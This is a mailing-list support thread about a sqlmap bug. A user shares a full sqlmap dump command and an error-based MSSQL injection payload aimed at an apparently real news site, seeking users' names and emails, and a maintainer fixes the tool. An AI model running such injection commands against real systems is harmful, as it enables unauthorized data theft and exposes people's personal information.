Re: [sqlmap-users] payload problem? "Incorrect syntax near"

[Vinicius Da L. <vin...@gm...>]

Confirmed fixed! You rock!

Thanks!


2013/11/12 Miroslav Stampar <mir...@gm...>

> Hi.
>
> Could you please update and retry it now?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Tue, Nov 12, 2013 at 2:13 PM, Vinicius Da Loop <
> vin...@gm...> wrote:
>
>> Hello,
>>
>> List db ok, list tables and columns OK, but when I try dump contents, got
>> 'Incorrect syntax' error in html response, so I suspect that something is
>> wrong about the payload sent by sqlmap:
>>
>> ./sqlmap.py -u "http://www.[snip].br/noticias/[snip].asp?ID=4416"
>> --random-agent --threads=1 --technique=E -D 057 -T Cadastro -C
>> CAD_ID,CAD_Nome,CAD_Email --dump -v 6
>>
>> [PAYLOAD] 4416 AND 9709=CONVERT(INT,(SELECT
>> CHAR(113)+CHAR(119)+CHAR(122)+CHAR(114)+CHAR(113)+(SELECT
>> ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> 057.dbo.Cadastro)+CHAR(113)+CHAR(115)+CHAR(117)+CHAR(119)+CHAR(113)))
>>
>> [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 2 times
>>
>> HTML RESPONSE:
>>
>> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial"
>> size=2>error '80040e14'</font>
>> <p>
>> <font face="Arial" size=2>Line 1: Incorrect syntax near '057.'.</font>
>>
>> Any clue?
>> Thanks!
>>
>>
>> ------------------------------------------------------------------------------
>> November Webinars for C, C++, Fortran Developers
>> Accelerate application performance with scalable programming models.
>> Explore
>> techniques for threading, error checking, porting, and tuning. Get the
>> most
>> from the latest Intel processors and coprocessors. See abstracts and
>> register
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=60136231&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>